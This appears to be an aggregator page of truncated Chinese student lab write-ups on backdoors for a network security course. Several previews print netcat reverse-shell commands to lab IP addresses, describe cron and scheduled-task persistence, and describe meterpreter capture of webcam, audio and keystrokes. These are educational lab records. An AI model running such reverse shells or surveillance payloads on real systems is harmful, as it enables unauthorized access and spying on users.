Exp2 后门原理与实践 实验内容 任务一 使用netcat获取主机操作Shell,cron启动 1.确认kali和主机的ip,关闭防火墙 (192.169.127.132) (10.1.1.197) 2.1.windows 打开监听 c:\your_nc_dir>ncat.exe -l -p 5213 2.2Linux反弹连接win root@KaliYL:/var/www/html# nc 10.1.1.197 5213 -e /bin/sh 2.3.windows下获得一个linux sh…
#2017-2018-2 <网络对抗技术> 20155322 第五周 Exp2 后门原理与实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过程 2.1-使用nc实现mac,Linux间的后门连接 2.2-使用netcat获取主机操作Shell 2.3使用socat获取主机操作Shell 2.4-meterpreter的应用 2.5-Meterpreter常用功能 2.6-基础问题回答 3-实验感想&参考资料 1-实践目标 1.1-实践介绍…
2018-2019-2 网络对抗技术 20165228 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,此时后门植入系统就太轻松了. (2)例举你知道的后门如何启动起来(win及linux)的方式? win:任务计划启动 linux:通过cron启动 (3)Meterpreter有哪些给你映像深刻的功能? 无论是截屏,拍照,还是录音,都会泄露隐私,特别是击键记录,盗取账号密钥十分容易. (4)如…
2018-2019-2 20165212<网络对抗技术>Exp2 后门原理与实践 1.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成she…
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或netcat获取远程主机的Shell 1.1 Windows获得Linux Shell 1.2 Linux获得Win Shell 1.3 Mac获取Win shell 1.4 Win获取Mac Shell 1.5 Mac获取Linux Shell 1.6 Linux获取Mac Shell 1.7 Netcat扩展知…
20165207 Exp2 后门原理与实践 〇.实验准备 两个虚拟机,一个kali一个win7.kali的ip是192.168.43.72,win7的ip是192.168.43.116,在win7关掉防火墙并且虚拟机设置都选择桥接的情况下,两台虚拟机能够相互ping通. 把老师分享给我们的ncat和socat拷到win7里面. 一.实验内容 1.使用netcat获取主机操作Shell,cron启动 1.1.kali使用netcat获取主机操作shell kali在5207端口开启监听: win7…
Exp2 后门原理与实践 准备工作 1. 查看Linux和Win的IP地址,ping通 Linux地址 Win7地址 ping 2.下载ncat并装载到win7主机 3.下载socat并装载到win7主机 使用netcat获取主机操作Shell,cron启动 Linux获得win7 Shell linux作为攻击方,win7作为靶机 linux打开8125端口,开始监听 nc -l -p 8125 win7反弹链接Linux ncat.exe -e cmd.exe 192.168.72.130…
Exp2 后门原理与实践 实验环境 win7ip地址为: 192.168.136.130 kali.ip地址为: 192.168.136.129 两台虚拟机可以ping通 实验步骤 1,使用netcat获取主机操作Shell,cron启动 (1)使用WIN7进行监听,kali反弹连接.WIN7中输入ncat.exe -l -p 5222,获取监听. kali中输入nc 192.168.136.130 5222 -e /bin/sh,与WIN7进行连接,WIN7获得kali的shell. 反过来,…
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式?在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,.(2)例举你知道的后门如何启动起来(win及linux)的方式?win:任务计划启动linux:通过cron启动(3)Meterpreter有哪些给你映像深刻的功能?无论是截屏,拍照,还是录音,都会泄露隐私,(4)如何发现自己有系统有没有被安装后门?通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式. Linux:…
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标…
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Windows下,先使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的5324端口: 在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5324端口: Windows下成功获得了一个Kali的shell,运行ls指令如下: Linux获得Windows Shell 过程与之…
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 二.基础知识 Kali地址:192.168.153.134 Wi…
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat,然后各使用netcat互相攻击一次.最后使用在linux用cron设置一个定时启动. (2)使用socat获取主机Shell, 任务计划启动 与第一个区别在于,第二个虚拟机使用Windows的任务计划启动一次,设置一个定时启动. (3)使用MSF meterpreter生成可执行文件,利用ncat或…
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权…
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题 例举你能想到的一个后门进入到你系统中的可能…
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Meterpreter 实验内容 任务一:使用netcat获取主机操作Shell,cron启动 任务二:使用socat获取主机操作Shell, 任务计划启动 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 任务四:使用MS…
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内置的木马程序. 例举你知道的后门如何启动起来(win及linux)的方式? Windows:设置为开机自启动.用户直接执行带有后门的可执行文件 Linux:通过crontab功能将后门设为定时启动:也可以通过对正常软件绑定注入shellcode Meterpreter有哪些给你映像深刻的功能? 我认…
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼,自己的隐私被泄露遭到社会工程学攻击然后进入了会自动下载插件的网址. (2)例举你知道的后门如何启动起来(win及linux)的方式? 计算机病毒课上讲过可以修改win注册表项造成开机自启动. 或者更换图标使用户误认为是需要运行的文件,造成启动. (3)Meterpreter有哪些给你映像深刻的功能?…
2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
2018-2019-2 <网络对抗技术>Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用socat获取主机操作Shell, 任务计划启动 (0.5分) 任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像…
Exp2 后门原理与实践 一.基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:在网上点击不安全的网页或链接. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答: windows : 先关闭防火墙和杀毒软件,右键管理员运行,通过cmd来运行. linux : 通过crontab指令,由计划任务启动. 3.Meterpreter有哪些给你映像深刻的功能? 答:Meterpreter不只可以录音截屏,还可以记录键盘输入和录像,这说明如果我们的电脑被装入后门,…
20165306 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载的软件有后…
NetSec2019 20165327 Exp2 后门原理与实践 快速找到重点: (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) (5)…
Exp2 后门原理与实践 目录 1. 实验原理 2. 实验内容 3. 问题回答 4. 心得体会 实验原理简介 后门:不经过正常流程而访问系统的通道 ncat:底层工具,进行基本的TCP UDP数据收发 在两台电脑之间建立链接并返回数据流 *** 常用参数选项说明*** nc -h查看 -4 使用IPV4 -6 使用IPV6 -c, --sh-exec <command> 接收到的命令通过command(例如/bin/bash)执行 -e, --exec <command> 和-c差…
Exp2 后门原理与实践 20164318 毛瀚逸 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:下载奇怪的文件并运行,通过操作系统的漏洞来获取电脑的高级权限. 2.例举你知道的后门如何启动起来(win及linux)的方式? 答:设置定时运行,在设定的时间自动启动. 3.Meterpreter有哪些给你映像深刻的功能? 答:拍照,如果别人入侵了我的电脑,是不是可以随时窥探我在做什么呢. 4.如何发现自己有系统有没有被安装后门? 答:各种杀软都应该可以应付…
Exp2 后门原理与实践 1.实验内容  (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接S…
2018-2019-2 网络对抗技术 20165308 Exp2 后门原理与实践 1.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, 任务计划启动 (0.5分) (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,…
2018-2019-2 20165312<网络攻防技术>Exp2 后门原理与实践 课上知识点梳理总结 1.后门的概述 后门是指不经过正常认证流程而访问系统的通道 两个关键词:未认证.隐通道 后门执行的过程:后门程序(.exe)->投送到系统中->启动->隐藏 2.NC或netcat 进行基本的TCP.UDP数据收发 linux下自带ncat,man ncat可以查看用法 windows下需要下载ncat,且执行操作时需要在ncat路径下 windows(攻击者)获取linux…
20165205 Exp2 后门原理与实践 实验内容 一.基础问题回答 列举你能想到的一个后门进入到你系统中的可能方式 下载盗版软件.操作系统 当然正版软件里可能也有编写者安装的后门 不在官方更新软件 浏览危险网页 购买二手电脑 列举你知道的后门如何启动起来(win及Linux)的方法 后门伪装自己,后门伪装成正常软件,或者和正常软件绑定在一起,点击就运行了 cron启动 被设置了开机自启动 Meterpreter有哪些给你印象深刻的功能 Meterpreter为我们准备好了许多零件,我们想要做…